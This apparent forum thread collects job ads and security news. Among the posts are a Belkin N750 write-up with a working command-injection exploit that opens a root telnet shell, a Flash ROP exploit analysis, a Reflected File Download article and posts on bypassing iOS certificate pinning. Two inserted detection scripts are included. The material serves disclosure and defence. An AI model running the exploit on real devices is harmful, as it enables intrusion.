KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early '90s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets.

What are we looking for?
An Application Developer for our IT Advisory team. The job's daily activities include design, development, maintenance and integration of business applications. C# will be the usual programming language, Visual Studio the development environment and Microsoft SQL Server the data storage engine.

Responsibilities:
• Building new systems with ASP.MVC, ASP.NET, SQL Server 2008/2012, Entity Framework and LINQ;
• Developing new functionality on our existing software products;
• Leading/mentoring IT staff and sharing knowledge through knowledge-sharing presentations;
• Participating in a small, experienced, energetic development team.

Requirements:
• Solid knowledge of C# and .NET Framework, OOP concepts, algorithms and data structures - minimum 4 years of experience;
• Web development experience (ASP.MVC, ASP.NET, JavaScript, AJAX, CSS, JSON, jQuery) - minimum 4 years of experience;
• Very good knowledge of T-SQL and relational database design - minimum 4 years of experience;
• Graduate of Computer Science/Cybernetics/Information Technology/Electronics College;
• Fluent in English;
• Ability and willingness to work as part of a team of developers;
• Learning oriented person.

Additional advantage:
• Active Reports, SQL Reporting Services;
• Java & InstallShield knowledge;
• Active Directory knowledge;
• Knowledge of WCF Web Services, WCF Data Services.

Note: I can provide more information. PM me if you are interested.

Bestjobs: Application Developer at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
  9. Company: KPMG Romania (where I also work) IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to: Career news & insights | KPMG | RO

Who are we?
KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early '90s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets.

What are we looking for?
A team member for our IT Department. Someone with good interpersonal skills who is able to communicate easily with KPMG staff, based on his proficiency in English. The candidate should be a strong team player and possess very good time management and task follow-up skills. Moreover, the candidate should demonstrate rigor in his daily routine while treating all staff requirements with solicitude.

Job objective
The overall job objective is to create an interface between the IT Department and end users in order to increase the responsiveness of the IT team to daily and ordinary assistance demands coming from staff. Provide support to staff on all company supported applications. Troubleshoot computer problems, determine the source, and advise on appropriate action.

Responsibilities:
• Respond to requests for technical assistance in person, via phone, and email;
• To assist end-users in all IT applications and equipment related issues;
• Diagnose and resolve technical hardware and software issues, and document resolutions for future reference;
• Determine the source of computer problems (hardware, software, user access, etc.) and advise staff on appropriate action;
• Serve as liaison between staff and the IT department to resolve issues;
• Perform hardware and software installations;
• Follow standard help desk & incident management procedures: log all help desk interactions, redirect problems to the appropriate resource, identify and escalate situations requiring urgent attention, track and route problems and requests and document resolutions, prepare activity reports, stay current with system information, changes and updates;
• To ensure, as part of the IT team, the proper operation of all IT and Telecommunication items / equipment;
• To take part in the implementation of new IT applications and/or management information systems;
• To contribute to the development, improvement and implementation of new IT policies within the Firm and to monitor staff compliance;
• To provide full end-user support in using customized specific IT applications;
• To deliver on the spot and / or regular IT assistance to staff.

Required skills:
• University degree in Information Technology or related sciences;
• At least 2 years prior work experience as a member of an IT team;
• Relevant work experience in hardware, software & communication troubleshooting;
• Knowledge of Windows 7/8, Office applications - Microsoft certification desirable;

Performance standard requirements: Core Competencies defined for Infrastructure staff (link)

Note: I can provide more information. PM whoever is interested.

Bestjobs: IT Service Desk at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
  10. Company: KPMG Romania (where I also work)

Candidate profile:
Participate in IT advisory projects together with other team members;
Assist the in-charge and the manager during the fieldwork and project documentation;
Perform various project related tasks in accordance with the instructions of the in-charge and the manager;
Document the information in dedicated working papers as per KPMG methodology;
Assume indicated roles in projects according to your position;
Liaise with the clients to understand, obtain and assess specific information.

Specific requirements:
Bachelor's degree in Economics, Information Systems Management, Cybernetics, Information Technology or related;
Information Technology knowledgeable and passionate;
Ability to communicate accurately and efficiently in English, both verbally and in writing;
Flexible in working independently or in a team, as required by tasks assigned;
Ability to understand and meet deadlines and to perform work under pressure;
Previous experience in a consulting company would be a plus;
Available for business travel;
Drive for developing professionally and building long term relationships with clients and colleagues.

Note: I can provide more information. PM me if anyone is interested.

Bestjobs: IT ADVISORY JUNIOR/ INTERN at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
  11. XML Schema, DTD, and Entity Attacks
May 19, 2014, Version 1.0
Timothy D. Morgan (@ecbftw)
Omar Al Ibrahim (oalibrahim@vsecurity.com)

Contents
Abstract
Introduction
  Motivation
  Background
  Prior Art
General Techniques
  Resource Inclusion via External Entities
  URL Invocation
  Parameter Entities
  External Resource Inclusion via XInclude Support
  Denial of Service Attacks
Implementation-Specific Techniques and Limitations
  Java / Xerces
  C# / .NET
  Expat
  Libxml2
  PHP
  Python
  Ruby
Recommendations For Developers
  Java / Xerces
  C# / .NET
  Expat
  Libxml2
  PHP
  Python
  Ruby
Recommendations For XML Library Implementors
Future Work
Acknowledgements
References

Download: http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
  12. CONTENT
Introduction
It's all about entities
Parameter entities
Validity and well-formedness
XXE Data Retrieval
Peculiar features of attacks on various parsers
References
About Positive Technologies

Download: https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
  13. How To Steal $999,999.99 From Visa Contactless Cards Without PIN.
Posted on November 6, 2014 by Waqas

Findings from the newly submitted research paper at Newcastle University will shock many of the people using the VISA contactless payment system. The amazing aspect of the research is that it doesn't involve any kind of hack; it's just a trick that can force contactless payment owners to pay much more than they were willing to spend. Such an attack is a special type of Man in the Middle (MitM) attack. So, fasten your seat belts and get ready, because something quite astonishing is about to be unraveled!

Let's first look at how the contactless bank payment system works. Contactless bank payment (which relies on near field communication technology) allows its users to pay with a wave of the card at the payment terminal (the card must be within 5 cm of the terminal to work). The system is widely used at a number of places (London's Oyster and Sydney's Opal are examples) to charge the users instantaneously. When a user waves the card through the electromagnetic field, an antenna inside the card produces a small current, and this wakes up the chip inside the card, which reads the data, makes the calculations and provides the reply.

Now you must be wondering what's wrong with the system. Really, there is a massive loophole in the system; let me unravel it. Consider a rigged payment terminal put into place, and it detects your card for payment. Though for small transactions only (less than $20) no PIN is required, serious cash can be made if the machine can trick a large number of cards each day. It's like a magnetic field that is always looking to attract different types of materials.

When the researchers dug deeper into this problem, they found a number of concerns over the usage of cards and the related policies:
1. When using VISA cards for foreign payments, the restriction of entering a PIN for payments over 20 pounds is omitted.
2. When paying in foreign currency, the official restriction in terms of local currency for the payment is omitted, and the card can be charged an amount as large as eight figures. So, if you are in the UK, your card can be charged up to US$999,999.99 (not a bad deal for an ordinary thief).
3. When paying offline over 100 pounds in foreign currency, security for the payment is reduced and the card is committed to the transaction without even involving the bank. Though the researchers are not yet sure if transactions exceeding the available balance are allowed or not, once the transaction is made offline the thief can easily create a fake document to claim the money or show that the money belongs to him, and the real owner only gets updates once the transaction is processed.

Another concern that is not related to the usage of cards but to the terminals:
1. Terminals can even work as a spying tool, as many people use these NFC terminals to get information to their smartphones offline, and if rigged these terminals can easily gather information from people's smartphones.

So, what should be done to stop this from becoming a reality? Well, the researchers have listed some important tips for the contactless payment system and the developers.

Tips for the developers:
1. Always require a PIN for foreign currencies.
2. Always require online transaction verification for foreign currencies.

Tips for technology users:
1. If you don't travel overseas regularly, ask your bank if it offers an option to prevent transactions in foreign currencies.
2. Keep your card in a wallet or cover that blocks electromagnetic radiation so it has to be taken out to be used.
3. Do your low value payments with cash, so you don't need contactless transactions enabled on your card at all.

Source: http://hackread.com/how-to-steal-million-from-visa-contactless-cards/
14. EFF: VPNs will crumble Verizon's creepy supercookie stalkers. Now that ad networks are jumping on the privacy vulnerability. By Iain Thomson, 6 Nov 2014

The Electronic Frontier Foundation says Verizon's silent supercookies, which always follow subscribers around the internet, are being abused by creepy advertisers to push targeted ads. The EFF says people should start using encrypted VPNs by default to claw back their privacy, because opting out of the system is not enough.

Two years ago Verizon started stamping a unique identifier token header (UIDH) on each website visit made by subscribers via its cellular data network. As the name suggests, the identifiers are unique to each person, allowing website owners to quietly build up profiles on people using these ID codes. These records of online behavior are valuable to advertisers, as it allows them to get an idea of which adverts to display to each person: someone tracked across cycling websites will end up being shown ads for new bikes, for example.

Verizon allows people to "opt-out" of the system, meaning the telco won't allow advertisers to directly request and analyze your online wanderings, but the setting is mostly useless: every single HTTP request via its network is stamped with a UIDH regardless of the opt-out, and is thus visible to any web server one visits.

Now it appears that ad networks are using the UIDHs to monitor internet users without all that tiresome business of actually paying Verizon for the privilege, and since the system is baked in by the company there's very little people can do to stop them. Code has already appeared on Github (since removed) that would allow anyone with the right setup to track Verizon's identifier, and reports are surfacing that Twitter has also managed to find a way to follow the telco's clients online using the UIDH information.

The UIDH system is also pernicious in that it bypasses the anti-tracking measures in iOS and Android that are designed to protect mobile users' privacy: these measures tackle web cookies, rather than the specific UIDH HTTP header.

"It is possible to build an opt-out system that would stop this, but it would take a considerable amount of work and the current systems just can't do it," EFF staff technologist Jacob Hoffman-Andrews told The Register.

Stamping a mandatory ID number on subscribers is such a nice idea that AT&T is also reportedly considering the same "feature" for its customers.

The only way to block the use of the UIDH system is to use a VPN and/or Tor for your online browsing. Tor is usually your go-to software for privacy, but it can be difficult to set up on a mobile; almost all smartphones, however, have a VPN mode baked in, and Hoffman-Andrews recommended users activate it to maintain online anonymity.

"The only way, in the short term, to stop this is if enough people complain about it," Hoffman-Andrews said. "Longer term, once we get encryption across the whole internet, this kind of thing will be less of an issue. But that's 10 or 20 years away at least."

Source: EFF: VPNs will crumble Verizon's creepy supercookie stalkers • The Register
15. From 0-day to exploit – Buffer overflow in Belkin N750 (CVE-2014-1635)

Vulnerability Summary

A vulnerability in the guest network web interface of the Belkin N750 DB Wi-Fi Dual-Band N+ Gigabit Router with firmware F9K1103_WW_1.10.16m allows an unauthenticated remote attacker to gain root access to the operating system of the affected device. The guest network functionality is default functionality and is delivered over an unprotected wifi network. Successful exploitation of the vulnerability enables the attacker to gain full control of the affected router.

Vulnerability Discovery

Fuzzing plays an important role in vulnerability discovery and this time was no different. After some fuzzed requests I noticed that the POST parameter "jump" suffered from a classic buffer overflow with a payload containing 5000 bytes. After the referred buffer overflow the process died. This behavior was consistent with a traditional buffer overflow and the question that popped into my mind was whether this was exploitable. To try to clear this out I considered two possible approaches to be able to analyze the vulnerable process:

Virtualization of the router process – would enable the debugging of the mips32 process on an x86 machine but would probably need some binary patching or function injection to bypass hardware or configuration access limitations on QEMU.

Patching the router firmware – would enable opening a backdoor and putting debugging tools inside the router, with some risk of bricking the router in the process.

In the first stage of the investigation I decided that virtualization of the affected process was the simplest and least risky approach to investigate the exploitability of this vulnerability. To get this done I downloaded the firmware to identify the process responsible for the crash. After binwalking the firmware and finding a Linux mips32 system, both virtualization and patching approaches seemed viable since all files were extracted without problems.

Binwalk extracted the squashfs filesystem from the image, and in a few minutes the router filesystem was available for further analysis. By analyzing the strings in the http and minhttp binaries, it was possible to discover that the webserver available in the guest wifi network where the buffer overflow occurred was in fact minhttp.

The Virtualization

As stated above, to better analyse this vulnerability I decided to virtualize the minhttp process. For that I used qemu-mipsel-static since there is a lot of info about the subject and I had previous successful experiences with it. At first try qemu-mipsel-static refused to execute the minhttp daemon: the error "Can't bind to any address" in this context means that the process is trying to bind to an IP address that does not exist on the system. A grep on the binary immediately discloses the IP address where the process was trying to bind. With the correct IP address on the interface, qemu is finally able to run the process, but after trying to access the contents of the site strace shows us that the CWD is wrong and that the process, running with a wrong current working directory, is not able to get and present the html files. This happens because the execution of qemu must be done in a chroot of the firmware, which means that the execution of the binary will have the root of the file system of the firmware as CWD and not /www as expected by minhttpd. To solve this issue I thought of two possible approaches and both worked. The first was to use LD_PRELOAD to load a custom library hooking a function used in minhttpd so that the hooked function executes the change of directory. The second was to use the binfmt module to execute the mips32 binary in a seamless manner: instead of executing minhttpd directly from qemu I executed the mips32 /bin/sh inside the chroot of the firmware and then changed the CWD to the correct place before executing the minhttpd binary using the mips32 /bin/sh.
To configure binfmt I used the following signature:

echo ':mipsel:M::\x7fELF\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00:\xff\xff\xff\xff\xff\xff\xff\x00\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xff\xff\xff:/usr/bin/qemu-mipsel-static:' > /proc/sys/fs/binfmt_misc/register

The following image shows the execution of the mips32 process on an x86 system using binfmt.

After all the tweaks necessary to get the process running I activated the instruction tracing in QEMU (-d in_asm,cpu) and confirmed the exploitability. OK, now I had confirmation that this vulnerability could be exploited with a payload with mips32 machine code. While trying to identify the correct amount of bytes I used incremental buffers and noticed that the minhttp process had different behaviors with different payload sizes:

Below ±1300 bytes the request was correctly handled.
Above ±1300 and below ±2000 bytes the minhttp process returned an empty http response.
Above ±2000 bytes the minhttp process crashed.

It seemed that a buffer size between ±1300 and ±2000 crashed something, but was not enough to crash the process. This strange behavior needed a deeper analysis, and quickly after stracing the process I had confirmation that this vulnerability was much more than a simple buffer overflow with remote machine code execution. The strace below shows that buffers bigger than ±1300 bytes trigger some kind of execution using /bin/sh. With a payload that is big enough, it is possible to execute the string in the request, as we can see on the underlined execve(). But how to take advantage of this backdoor-like vulnerability? The disassembler came to my help.

Reverse Engineering for the root cause

Using the IDA Pro disassembler I was able to identify the problem: the overflow occurred due to the usage of the insecure strcpy() function.
The vulnerability exists due to improper buffer handling using the strcpy() function at address 0x00402570 as presented in the image below. The source buffer processed by strcpy() comes from the POST parameter "jump" and is returned by the get_cgi() function at 0x00402550. The buffer overflow enables control of a variable named do_xread located in the heap that is used to decide the execution of CGIs. The decision point occurs at address 0x0040338C where the $v1 register, which holds the value of the overwritten do_xread, is compared with zero. The CGI execution is done using the popen() function as we can see at address 0x004033D0. The popen() function opens a process by creating a pipe, forking, and invoking the shell, so the argument to popen() is supposed to be a pointer to a null-terminated string containing a shell command line that will be passed to /bin/sh using the -c flag. The name of the CGI to be executed is also in the heap, somewhere between 0x004476D0 and 0x00447AD0 near do_xread. So, since the two variables are conveniently near each other, it is possible with only one oversized payload processed by strcpy() to overwrite do_xread (the control variable) and byte_4476D0 (the variable with the name of the CGI to be executed). As described before, the name of the CGI is processed with popen(), so instead of a file name we can inject several commands at once, separated for instance by a semicolon. This vulnerability enables control over a part of heap memory where a variable that forces the execution of a CGI and also the variable with the name of the CGI to be executed are stored. In conclusion, the requirements for injecting commands are fulfilled.
Vulnerability Exploitation

An attacker could exploit this vulnerability by preparing a special POST where the parameter "jump" takes some padding (1379 bytes) concatenated with the commands to be executed and with something different from zero to overwrite do_xread and enter the section of code that invokes popen() by failing the jump BEQZ at address 0x0040338C. The image below shows the execution of utelnetd using this exploit.

Exploit Code

The following Python code to exploit this vulnerability enables the execution of commands in the router; in this case the telnet service is started and by default the login program is /bin/sh so… with no login prompt.

#!/usr/bin/python
# Title    : Belkin n750 buffer overflow in jump login parameter
# Date     : 28 Jan 2014
# Author   : Discovered and developed by Marco Vaz <mv@integrity.pt>
# Tested on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)

import httplib  # Python 2 HTTP client

headers = {}
# 1379 bytes of padding reach do_xread; what follows is handed to popen()
body = "GO=&jump=" + "a" * 1379 + "%3b" + "/usr/sbin/utelnetd -d" + "%3b&pws=\n\n"
conn = httplib.HTTPConnection("192.168.169.1", 8080)
conn.request("POST", "/login.cgi", body, headers)
response = conn.getresponse()
data = response.read()
print data

I have developed a Metasploit module to exploit this vulnerability that also executes iptables commands so that it is possible to access the telnet server directly from the guest network to the root shell. You can get it here: belkin_rce_cve-2014-1635.rb.

Written by Marco Vaz

Source: https://labs.integrity.pt/articles/from-0-day-to-exploit-buffer-overflow-in-belkin-n750-cve-2014-1635/
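Detection logic for the request shape described in the post above, as an added example that is not code from the article or from Marco Vaz: it flags POSTs to the guest-network login page whose "jump" parameter is oversized (the ~1300-byte threshold and 1379-byte padding are the article's numbers) or carries shell separators, which matter because the overwritten CGI name ends up in popen(). The sample requests, the path check and the metacharacter set are constructed assumptions.

```python
"""Flag HTTP requests shaped like the Belkin N750 "jump" overflow (CVE-2014-1635).

Added example, not code from the article. It scans constructed request
records and reports POSTs to the login page whose "jump" parameter is
oversized (the article sees misbehaviour above roughly 1300 bytes and uses
1379 bytes of padding) or carries shell metacharacters (the CGI name that
the overflow overwrites is handed to popen(), i.e. /bin/sh -c, so ';'
separates commands).
"""
from urllib.parse import parse_qs

JUMP_LEN_THRESHOLD = 1300       # from the article: above this the heap is corrupted
SHELL_META = set(";|&`$\n\r")   # characters /bin/sh -c treats specially (assumed set)


def analyse_request(method, path, body):
    """Return a list of finding strings for one request; empty means benign."""
    findings = []
    if method != "POST" or not path.startswith("/login.cgi"):
        return findings
    # parse_qs percent-decodes, so "%3b" on the wire shows up here as ";"
    params = parse_qs(body, keep_blank_values=True)
    for jump in params.get("jump", []):
        if len(jump) >= JUMP_LEN_THRESHOLD:
            findings.append("oversized jump parameter (%d bytes)" % len(jump))
        meta = sorted(SHELL_META & set(jump))
        if meta:
            findings.append("shell metacharacters in jump: %r" % "".join(meta))
    return findings


# Constructed sample traffic: (method, path, url-encoded body).
# Request 1 has the overflow shape from the article with a placeholder command;
# request 2 is short but smuggles a separator; the others are benign.
SAMPLE_REQUESTS = [
    ("POST", "/login.cgi", "GO=&jump=index.html&pws=hunter2"),
    ("POST", "/login.cgi", "GO=&jump=" + "a" * 1379 + "%3bCOMMAND%3b&pws="),
    ("POST", "/login.cgi", "GO=&jump=status.html%3bCOMMAND&pws="),
    ("GET", "/login.cgi", ""),
]


def scan(requests=SAMPLE_REQUESTS):
    """Map request index -> findings for every request that raised one."""
    report = {}
    for i, (method, path, body) in enumerate(requests):
        findings = analyse_request(method, path, body)
        if findings:
            report[i] = findings
    return report


if __name__ == "__main__":
    for idx, found in scan().items():
        print("request %d:" % idx, "; ".join(found))
```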
16. Cracking the CVE-2014-0569 nutshell. msft-mmpc, 5 Nov 2014 5:00 PM

The Microsoft Malware Protection Center (MMPC) has recently seen an exploit targeting the Adobe Flash Player vulnerability CVE-2014-0569. This exploit is being integrated into the Fiesta exploit kit. The vulnerability related to this malware was addressed with a patch released by Adobe on 14 October 2014. Adobe Flash Player desktop runtime for Windows versions 15.0.0.167 and earlier are vulnerable. If you're using a vulnerable Adobe Flash Player version you should update now to help protect your PC.

We analyzed how these attacks work and found the following details. The exploit successfully bypasses the validation of the memory range and is able to access an arbitrary location. It attempts to corrupt the VTABLE entry for the virtual function toString() of the Sound object. Later, the ActionScript calls the Sound.toString() method and control is transferred to the controlled address, as shown in Figure 1.

Figure 1: Transfer control via a corrupted VTABLE Sound.toString()

At the controlled address, it starts the ROP gadgets built from the Flash Player DLL, as shown in Figure 2.

Figure 2: Control transferred to ROP gadgets

These ROP gadgets are a bit convoluted, but they can be summarized in the following steps:

The gadgets prepare the data on the stack using a loop of the following gadgets:

dec eax                    // decrement the address to build code
ret
pop ecx                    // store the code bytes in ECX
ret
mov dword ptr [eax],ecx    // store the code to the address specified by EAX
pop ebp
ret

Control is passed (via a ret instruction) to the API VirtualAlloc() to allocate a 0x1000 byte buffer.

It uses the gadget:

mov dword ptr [eax],ecx    // store the code
pop ebp
ret

to build some new gadgets at the start of the allocated buffer, for example:

mov dword ptr [eax+0Ch],ecx
ret

These new gadgets build up a small piece of two-layer decryption code to decrypt the shellcode.

Control is passed over to the fully decrypted shellcode.

The shellcode downloads a file from the remote server and executes it. The downloaded file is detected as TrojanDropper:Win32/Ropest.A.

As well as keeping your software up-to-date, we also recommend running a real-time security product such as Microsoft Security Essentials to help protect your PC from this and other threats.

Chun Feng
MMPC

SHA1:
468f23ef2f6318ea59a3cbc5570ac766435a5315 (detected as Exploit:SWF/Fiexp.B)
61a776fda7d50655ea336b22499573250fa8761d (detected as TrojanDropper:Win32/Ropest.A)

Source: Cracking the CVE-2014-0569 nutshell - Microsoft Malware Protection Center - Site Home - TechNet Blogs
17. Reflected File Download - A New Web Attack Vector

PLEASE NOTE: As promised, I've published a full white paper that is now available for download: White paper "Reflected File Download: A New Web Attack Vector" by Oren Hafif.

In October 2014, as part of my talk at the Black Hat Europe 2014 event, I presented a new web attack vector that enables attackers to gain complete control over a victim's machine by virtually downloading a file from trusted domains. I decided to call this technique Reflected File Download (RFD), as malware can be "downloaded" from highly trusted domains such as Google.com and Bing.com without ever being uploaded.

As long as RFD is out there, users should be extremely careful when downloading and executing files from the web. The download link might look perfectly fine and include a popular, trusted domain and use a secure connection, but users still need to be wary. Look at the following link for example. Up until a few months ago, it could have been used to steal ALL cookies from your browser, perform actions on your behalf and steal emails from your Gmail inbox:

https://www.google.com/s;/ChromeSetup.bat

Google fixed the vulnerability so that the link above now only downloads a harmless text file.

RFD, like many other Web attacks, begins by sending a malicious link to a victim. But unlike other attacks, RFD ends outside of the browser context:

1) The user follows a malicious link to a trusted web site.
2) An executable file is downloaded and saved on the user's machine. All security indicators show that the file was "hosted" on the trusted web site.
3) The user executes the file which contains shell commands that gain complete control over the computer.

Figure 1 – The three steps attack flow of reflected file download

For a Reflected File Download attack to be successful, there are three simple requirements:

1) Reflected – Some user input is being "reflected" to the response content. This is used to inject shell commands.
2) Filename – The URL of the vulnerable site or API is permissive and accepts additional input. This is often the case and is used by attackers to set the extension of the file to an executable extension.
3) Download – The response is being downloaded and a file is created "on-the-fly" by the Web browser. The browser then sets the attacker-controlled filename that was parsed in requirement 2 above.

Figure 2 – A service is vulnerable if the three RFD requirements are met

Full article and video: Reflected File Download - A New Web Attack Vector - SpiderLabs
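The three RFD requirements above, turned into a check over a request/response pair, as an added example that is not code from the post or the white paper. The sample API response and the hardened headers are constructed; the risky-extension and rendered-content-type lists are assumptions, and the download decision is a simplification of what real browsers do.

```python
"""Check a request/response pair for the three Reflected File Download conditions.

Added example, not code from the post or the white paper. It encodes the
three requirements: (1) user input reflected into the body, (2) a permissive
URL whose trailing segment becomes the filename, (3) a response the browser
saves rather than renders. harden() shows a server-side header change that
breaks condition 2 by fixing the filename. The extension and content-type
lists are assumptions, and the download decision is simplified.
"""
import re
from urllib.parse import urlsplit

RISKY_EXTENSIONS = (".bat", ".cmd", ".exe", ".sh", ".ps1")   # assumed
RENDERED_TYPES = ("text/html", "text/plain", "image/")       # assumed


def download_filename(headers, url):
    """Name the browser would save under: the Content-Disposition filename if
    the server sets one, otherwise the last path segment of the URL."""
    cd = headers.get("Content-Disposition", "")
    match = re.search(r'filename="?([^";]+)"?', cd)
    if match:
        return match.group(1).strip()
    return urlsplit(url).path.rsplit("/", 1)[-1]


def is_download(headers):
    """True when the body would be saved to disk instead of rendered (simplified)."""
    ctype = headers.get("Content-Type", "").lower()
    if "attachment" in headers.get("Content-Disposition", "").lower():
        return True
    return not any(ctype.startswith(t) for t in RENDERED_TYPES)


def rfd_conditions(url, user_input, headers, body):
    """Evaluate the three RFD requirements for one request/response pair."""
    name = download_filename(headers, url).lower()
    return {
        "reflected": user_input in body,
        "filename": name.endswith(RISKY_EXTENSIONS),
        "download": is_download(headers),
    }


def is_vulnerable(url, user_input, headers, body):
    return all(rfd_conditions(url, user_input, headers, body).values())


def harden(headers, fixed_name="response.json"):
    """Server-side mitigation (assumed, not quoted from the post): pin the
    download name so the URL tail is ignored, and stop MIME sniffing."""
    out = dict(headers)
    out["Content-Disposition"] = 'attachment; filename="%s"' % fixed_name
    out["X-Content-Type-Options"] = "nosniff"
    return out


# Constructed sample: same shape as the post's Google link (an API path that
# tolerates an appended ";/name.bat" segment) with a harmless probe string.
MARKER = "rfd-probe-7f3a"
VULN_URL = "https://api.example.invalid/s;/ChromeSetup.bat"
VULN_HEADERS = {"Content-Type": "application/json"}
VULN_BODY = '{"query":"%s","results":[]}' % MARKER

if __name__ == "__main__":
    print("as served:", rfd_conditions(VULN_URL, MARKER, VULN_HEADERS, VULN_BODY))
    print("hardened: ", rfd_conditions(VULN_URL, MARKER, harden(VULN_HEADERS), VULN_BODY))
```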
18. Intercepting the App Store's Traffic on iOS

TL;DR: By default, MobileSubstrate tweaks do not get injected into system daemons on iOS, which explains why my SSL Kill Switch tool wasn't able to disable SSL certificate validation in the iTunes App Store.

The problem

Last year I released the iOS SSL Kill Switch, a tool designed to help penetration testers decrypt and intercept an application's network traffic by disabling the system's default SSL certificate validation as well as any kind of custom certificate validation (such as certificate pinning). While the tool worked well on most applications including SSL-pinning apps such as Twitter or Square, users reported that it didn't work with the iTunes App Store, which would still refuse to connect to an intercepting proxy impersonating the iTunes servers. Other similar tools such as Intrepidus Group's trustme also seemed to have the same limitation.

A quick look at the App Store on iOS

The first step was to get the right setup:

An intercepting proxy (Burp Pro) running on my laptop.
An iPad with the SSL Kill Switch installed, and configured to use my laptop as the device's proxy.

After starting the App Store app, I noticed that I could already intercept and decrypt specific SSL connections initiated by the App Store: all the HTTP requests to query iTunes for available apps (as part of the App Store's tabs such as "Featured", "Top Charts", etc.) as well as app descriptions ("Details", "Reviews"). However, more sensitive operations including user login or app installation and purchase would fail by rejecting my intercepting proxy's invalid SSL certificate.

From looking at logs on the device, it turns out that two distinct processes are behind the App Store's functionality:

AppStore[339] <Warning>: JS: its.sf6.Bootstrap.init: Initialize
itunesstored[162] <Error>: Aug 22 11:29:10 SecTrustEvaluate [root AnchorTrusted]

AppStore is the actual App Store iOS application that you can launch from the Springboard. It is responsible for displaying the App Store UI to the user.

itunesstored is a daemon launched at boot time by launchd, the process responsible for booting the system and managing services/daemons. itunesstored seems to be responsible for the more sensitive operations within the App Store (login, app purchase, etc.) and possibly some of the DRM/FairPlay functionality.

Why SSL Kill Switch didn't work

I initially thought the issue to be that the strategy used by the SSL Kill Switch to disable certificate validation somehow wasn't enough to bypass itunesstored's certificate pinning. However, it turns out that the SSL Kill Switch was just not being injected into the itunesstored process at all, for a couple of reasons:

The itunesstored process is started as a daemon by launchd early during the device's boot sequence, before MobileSubstrate and MobileLoader get started. Therefore, none of the MobileSubstrate tweaks installed on the device, including the SSL Kill Switch, get injected into this process.

The SSL Kill Switch had a MobileLoader filter so that the code disabling certificate validation would only be loaded into apps linking the UIKit bundle (i.e. applications with a user interface). This was initially done to restrict the effect of the SSL Kill Switch to App Store apps only. However, itunesstored is a daemon that doesn't have a user interface, hence the filter prevented MobileLoader from injecting the SSL Kill Switch into the process.

Man-in-the-Middle on itunesstored

After figuring this out, getting itunesstored to stop validating SSL certificates was very straightforward. First of all, make sure you're using the latest version of the SSL Kill Switch (at least v0.5). Then, all you need to do is kill the itunesstored process:

iPad-Mini:~ root# ps -ef | grep itunesstored
  501   170     1   0  0:00.00 ??         0:01.95 /System/Library/PrivateFrameworks/iTunesStore.framework/Support/itunesstored
    0   432   404   0  0:00.00 ttys000    0:00.01 grep itunesstored
iPad-Mini:~ root# kill -s KILL 170

When doing so, launchd will automatically restart itunesstored. This time however, MobileLoader will inject the SSL Kill Switch's code into the process. You can validate this by looking at the device's logs, for example using the Xcode console. You should see something like this:

itunesstored[1045] <Notice>: MS:Notice: Loading: /Library/MobileSubstrate/DynamicLibraries/SSLKillSwitch.dylib
itunesstored[1045] <Warning>: SSL Kill Switch - Hook Enabled.

If you restart the App Store app, you should then be able to proxy all the traffic and see App Store transactions such as logins or app downloads. If you try to install an app while proxying, your proxy might crash or freeze when the App Store tries to download the app because IPA files can be fairly large (200+ MB).

Takeaway

A similar methodology could be used to proxy other system daemons including for example accountsd, which is responsible for the Twitter and Facebook integration that was added to iOS 5 and iOS 6. While working on this, I also discovered a better way to disable SSL certificate validation and certificate pinning in iOS apps. Hence, SSL Kill Switch v0.5 is actually a complete rewrite. If you're interested in knowing how it works, I wrote a blog post explaining what the tool does.

Source: https://nabla-c0d3.github.io/blog/2013/08/20/intercepting-the-app-stores-traffic-on-ios/
19. iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill Switch - Prateek Gianchandani

In this article, we will look at how we can analyze network traffic for applications that use certificate pinning. One of the best definitions I found of certificate pinning is mentioned below. It is taken directly from this url.

By default, when making an SSL connection, the client checks that the server's certificate:
has a verifiable chain of trust back to a trusted (root) certificate
matches the requested hostname

What it doesn't do is check if the certificate in question is a specific certificate, namely the one you know your server is using. Relying on matching certificates between the device's trust store and the remote server opens up a security hole. The device's trust store can easily be compromised – the user can install unsafe certificates, thus allowing potential man-in-the-middle attacks. Certificate pinning is the solution to this problem. It means hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device's trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application. This also gives a possibility of trusting a host with a self-signed certificate without the need to install additional certificates on the device.

Certificate pinning is used by many popular applications, e.g. Twitter, Square etc. So the question that arises is, how do you bypass this certificate validation that is happening on the client side? The important thing to note here is that all the validation is happening on the client side. And since there are frameworks like Mobile Substrate that allow us to patch any method during runtime and modify its implementation, it is possible to disable the certificate validation that is happening in the application. A POC tool for this was released at Blackhat and it was named iOS SSL Kill Switch. The full presentation can be found here.

After some time, the author realized that he was able to inspect traffic from apps that used certificate pinning (e.g. Twitter), but he wasn't able to see the traffic going through the App Store app. He then realized he needed to patch even more low level methods and kill specific processes in order to inspect traffic going via the App Store app. The full writeup for this can be found here and it's quite interesting, so I suggest you give it a read. Also note that this tool will also be able to disable the default SSL certificate validation, so you don't need to install a certificate as trusted root as well, which is what we usually do for inspecting traffic over HTTPS.

To really check that the Twitter app uses certificate pinning, install the Twitter app and route the device traffic through Burp Proxy. Make sure you are inspecting traffic via HTTP/HTTPS using the steps mentioned in Part 11 of this series. However, when you open the Twitter app and navigate around, the traffic is not captured by Burp Suite.

